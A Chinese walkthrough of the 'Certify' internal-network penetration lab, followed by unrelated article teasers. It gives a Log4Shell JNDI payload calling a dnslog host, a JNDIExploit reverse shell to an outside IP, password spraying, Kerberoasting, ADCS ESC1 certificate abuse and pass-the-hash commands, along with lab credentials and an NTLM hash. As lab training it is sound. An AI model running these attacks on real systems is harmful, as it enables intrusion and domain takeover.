【内网渗透】最保姆级的春秋云镜Certify打靶笔记

目录

flag1

flag2 

flag3 

flag4

flag1

fscan扫外网

访问8983端口,发现配置项有log4j

【vulhub】Log4j2:CVE-2021-44228漏洞复现_vulhub cve-2021-44228-CSDN博客 

/solr/admin/collections?action=${jndi:ldap://z5o5w8.dnslog.cn}

dnslog测出可以打jndi 

java -jar JNDIExploit.jar -i 124.222.136.33

反弹shell,sudo grc提权

 

flag2 

切到/tmp目录wget下载fscan和frp,搭代理,扫内网

172.22.9.7 XIAORANG-DC

172.22.9.19 已拿下

172.22.9.26 DESKTOP-CBKTVMO

172.22.9.47 fileserver  

fileserver可以smbclient直连上去

proxychains4 impacket-smbclient 172.22.9.47

拿到personnel.db和flag02.txt

 

 

flag3 

用navicat打开personnel.db文件

一张导出为username.txt

 

一张导出为password.txt

 

 

处理一下导出文件内容的双引号

import sys# 检查是否提供了文件名参数
if len(sys.argv) != 2:print("Usage: python eraser.py <filename>")sys.exit(1)# 获取命令行参数中的文件名
filename = sys.argv[1]# 读取文件内容
with open(filename, 'r', encoding='utf-8') as file:content = file.read()# 删除所有双引号
content = content.replace('"', '')# 将处理后的内容写回原文件
with open(filename, 'w', encoding='utf-8') as file:file.write(content)print(f"所有双引号已删除,并将结果保存回 {filename}")

密码喷洒一下 

proxychains4 crackmapexec smb 172.22.9.26 -u username.txt -p password.txt --continue-on-success

 爆出来两个

xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY 

 两个rdp都失败了,flag2提示打SPN

proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY

得到zhangxia和chenchen的密码哈希,分别hashcat爆一下 

hashcat -a 0 -m 13100 hash.txt ./rockyou.txt

 

xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@

再rdp连上去,发现什么都没有

查看证书情况

proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

改一下/etc/hosts,避免超时

利用 ESC1

proxychains4 certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

 

拿到生成的administrator.pfx获取域管哈希

proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

pth拿域管

proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.26
type c:\users\administrator\flag\flag03.txt

flag4

proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
atype c:\users\administrator\flag\flag04.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1523977.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

C++string类相关OJ练习(2)

C++string类相关OJ练习(2)

个人主页&#xff1a;C忠实粉丝 欢迎 点赞&#x1f44d; 收藏✨ 留言✉ 加关注&#x1f493;本文由 C忠实粉丝 原创 Cstring类相关OJ练习(2) 收录于专栏【C语法基础】 本专栏旨在分享学习C的一点学习笔记&#xff0c;欢迎大家在评论区交流讨论&#x1f48c; 目录 1.反转字符串 …
阅读更多...
windows安装composer

windows安装composer

windows安装composer 1.介绍 Composer 是一个用于PHP的依赖管理工具。Composer允许你声明你的PHP项目所依赖的库&#xff0c;并管理它们。它会安装和更新你项目所需要的库。 Composer为我们的项目提供了两个功能&#xff1a; 帮助PHP进行依赖管理。在项目中实现文件自动加载…
阅读更多...
紫光同创——PLL IP 的使用(Logos2)

紫光同创——PLL IP 的使用(Logos2)

本文档主要针对 Logos2 系列的 PLL 配置&#xff0c;至于 Logos 系列的 PLL&#xff0c;可以参考《PLLIP 的使用(Logos)》的文档。 一、PLL IP 介绍 1、PLL 基本配置模式 Basic Configurations PLL IP 是紫光同创基于 PLL 及时钟网络资源设计的 IP&#xff0c;通过不同的参数配…
阅读更多...
电量提醒工具(充电提醒)

电量提醒工具(充电提醒)

可提醒50%到100%之间的整电量&#xff0c;女声提醒&#xff0c;不占资源&#xff0c;防止设备未充上电。 https://download.csdn.net/download/zzmzzff/89713499
阅读更多...
input系统之InputDispatcher

input系统之InputDispatcher

往期文章&#xff1a; Input系统之IMS的启动流程 input系统之InputReader 1.概述 InputReader和InputDispatcher是Input系统的重要组成部分&#xff0c;InputReader主要负责从设备节点获取原始输入事件&#xff0c;并将封装好的事件交给InputDispatcher&#xff1b;InputDis…
阅读更多...
快速构建 AI 应用的利器:Python 库 Mesop

快速构建 AI 应用的利器:Python 库 Mesop

在当今这个 AI 技术飞速发展的时代&#xff0c;开发者们总是希望能够更快、更便捷地构建 AI 应用程序。今天&#xff0c;我要给大家介绍一个由 Google 推出的 Python 库——Mesop。它的出现&#xff0c;让我们能够轻松地搭建高效的 AI 应用。 Mesop 是什么&#xff1f; Mesop …
阅读更多...
MATLAB生成COE文件

MATLAB生成COE文件

MATLAB代码 % 参数设置 N 4096; % 数据点数量 t linspace(0, 2*pi, N); % 时间向量 width 12; % 位宽% 正弦波&#xff0c;幅度在0到5之间 sine_wave 2.5 * sin(t) 2.5;% 三角波&#xff0c;幅度在0到5之间 tri_wave 5 * (1 - abs(mod(t/(2*pi)*4, 2) - 1));% 方波&…
阅读更多...
echarts--Y轴名称超宽换行显示行高问题处理

echarts--Y轴名称超宽换行显示行高问题处理

设置yAxis.axisLabel.overflow:break为超宽换行 yAxis: [{type: category,inverse: true, //y轴坐标轴向下position: left, // 设置 y 轴的位置在左边offset: 65, // 设置 y 轴距离左边的偏移量axisLine: {show: false,},axisTick: {show: false},axisLabel: {show: true,inter…
阅读更多...
集成电路学习:什么是MOSFET(MOS管)

集成电路学习:什么是MOSFET(MOS管)

一、MOSFET&#xff1a;MOS管 MOSFET&#xff0c;全称Metal-Oxide-Semiconductor Field-Effect Transistor&#xff0c;即金属-氧化物半导体场效应晶体管&#xff0c;也常被称为MOS管或金氧半场效晶体管。它是一种可以广泛使用在模拟电路与数字电路的场效应晶体管&#xff08;f…
阅读更多...
day07-集合-MapStream递归

day07-集合-MapStream递归

一、Collections 1.1 可变参数 可变参数就是一种特殊形参&#xff0c;定义在方法、构造器的形参列表里&#xff0c;格式是&#xff1a;数据类型... 参数名称 ​ 优点特点&#xff1a;可以不传数据给它&#xff1b;可以传一个或者同时传多个数据给它&#xff1b;也可以传一个数…
阅读更多...
【系统架构设计师-2022年】综合知识-答案及详解

【系统架构设计师-2022年】综合知识-答案及详解

文章目录 【第1题】【第2题】【第3题】【第4题】【第5题】【第6~7题】【第8题】【第9题】【第10题】【第11~12题】【第13题】【第14题】【第15题】【第16题】【第17~18题】【第19题】【第20题】【第21题】【第22题】【第23题】【第24题】【第25题】【第26题】【第27题】【第28题…
阅读更多...
【AQS源码】深入理解AQS的工作原理

【AQS源码】深入理解AQS的工作原理

【AQS源码】深入理解AQS的工作原理-CSDN博客
阅读更多...
叉车专用AI防撞预警系统,带行车记录功能,守护人车安全!

叉车专用AI防撞预警系统,带行车记录功能,守护人车安全!

AI防撞预警系统是一款为工业车辆等工程设备专门设计的智能视频监控装置。该系统通过三个独立的摄像头和深度学习算法实现机器视觉识别。 本系统的一个重要功能是能够能够实时侦测工作区域的危险状态并提供警示&#xff0c;一旦有人员进入危险区域&#xff0c;驾驶员即可得到动态…
阅读更多...
SpringBoot2:RESTFUL风格接口开发及源码解读

SpringBoot2:RESTFUL风格接口开发及源码解读

一、RESTFUL简介 Rest风格支持&#xff08;使用HTTP请求方式&#xff0c;动词来表示对资源的操作&#xff09; 以前&#xff1a;/getUser 获取用户 /deleteUser 删除用户 /editUser 修改用户 /saveUser 保存用户 现在&#xff1a; /user GET-获取用户 DELETE-删除用户 PUT-修改…
阅读更多...
海外合规|新加坡网络安全认证计划简介(三)-Cyber Trust

海外合规|新加坡网络安全认证计划简介(三)-Cyber Trust

一、 认证简介&#xff1a; Cyber Trust标志是针对数字化业务运营更为广泛的组织的网络安全认证。该标志针对的是规模较大或数字化程度较高的组织&#xff0c;因为这些组织可能具有更高的风险水平&#xff0c;需要他们投资专业知识和资源来管理和保护其 IT 基础设施和系统。Cy…
阅读更多...
ES6语法详解

ES6语法详解

以下是ES6常用的一些语法和特性&#xff1a; 声明变量的关键字变化&#xff1a;使用let和const、var来声明变量。 箭头函数&#xff1a;使用箭头&#xff08;>&#xff09;定义函数&#xff0c;简化函数的写法。 模板字符串&#xff1a;使用反引号&#xff08;&#xff0…
阅读更多...
【python】socket 入门以及多线程tcp链接

【python】socket 入门以及多线程tcp链接

Socket 入门 及 多线程tcp链接 网络基础知识三要素 Socket是套接字的意思,是网络编程的核心对象,通信两端都独有自己的Socket对象, 数据在两个Socket之间通过 字节流(TCP协议) 或者 数据报包(UDP协议)的形式进行传输. 本文主要针对tcp流程进行讲解 socket-tcp流程图 1.创建服…
阅读更多...
链表——单向链表续、双向链表

链表——单向链表续、双向链表

内存泄漏&#xff1a;当while&#xff08;1&#xff09;一直运行时&#xff0c;操作系统一直被申请空间&#xff0c;最终无空间可申请&#xff1b;造成内存泄漏。避免方法如&#xff1a;堆区手动申请的空间&#xff0c;都在用完后手动释放。 测试是否存在内存泄漏&#xff1a;…
阅读更多...
REAL-FAKE: EFFECTIVE TRAINING DATA SYNTHESISTHROUGH DISTRIBUTION MATCHING 论文学习

REAL-FAKE: EFFECTIVE TRAINING DATA SYNTHESISTHROUGH DISTRIBUTION MATCHING 论文学习

这篇文章主要讲的是生成数据在模型训练中的作用&#xff0c;对于接下来要研究的生成多模态数据具有重要的作用。 文章摘要首先讲生成数据很重要&#xff0c;但在训练高级的模型的时候效果不好。论文主要研究的是这背后的原理并且证明了生成数据的作用。 介绍部分&#xff0c;…
阅读更多...
Seataf分布式事务的使用

Seataf分布式事务的使用

一、事务的四大特征&#xff08;面试题&#xff09; 原子性&#xff1a;一个事务是不可分割的&#xff0c;要不都做&#xff0c;要不都不做一致性&#xff1a;事务必须是使数据库从一个一致性变成另一个一致性状态隔离性&#xff1a;一个事务的执行不被其他事务干扰&#xff0…
阅读更多...
最新文章

Copyright @ 2022~2023